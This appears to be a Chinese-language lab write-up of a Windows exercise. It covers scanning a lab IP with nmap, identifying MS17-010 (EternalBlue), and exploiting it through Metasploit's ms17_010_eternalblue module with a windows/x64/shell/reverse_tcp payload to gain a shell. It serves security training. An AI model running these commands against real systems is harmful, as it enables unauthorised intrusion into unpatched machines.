侦查
-
1000以下的端口号开放了多少个端口?
直接使用nmap -n 10.10.61.174对目标进行扫描,Nmap在默认情况下对常用的1000端口进行扫描
所以答案是3
-
这台机器容易受到什么影响?(答案形式为:ms??-???,ex: ms08-067)
提示的已经很明显了,这是Windows最出名的永恒之蓝漏洞,代号是MS17-010
使用nmap的vuln脚本扫描可以探测出
获得初始访问权限
使用metasploit利用,并获取权限
-
找到我们将针对机器运行的利用代码。代码的完整路径是什么?(例如:利用/........)
漏洞利用使用的msfconsole模块,exploit/windows/smb/ms17_010_eternalblue
-
显示选项并设置一个所需的值。这个值的名称是什么?(提交全部大写)
通常按原样运行此漏洞利用程序会很好;但是,为了学习,您应该在利用目标之前再做一件事。输入以下命令并按回车键:
set payload windows/x64/shell/reverse_tcp
这里我们按照他的应道,把payload设置为windows/x64/shell/reverse_tcp,然后再次利用
利用成功后,摁下CTRL + Z可以将session到后台运行
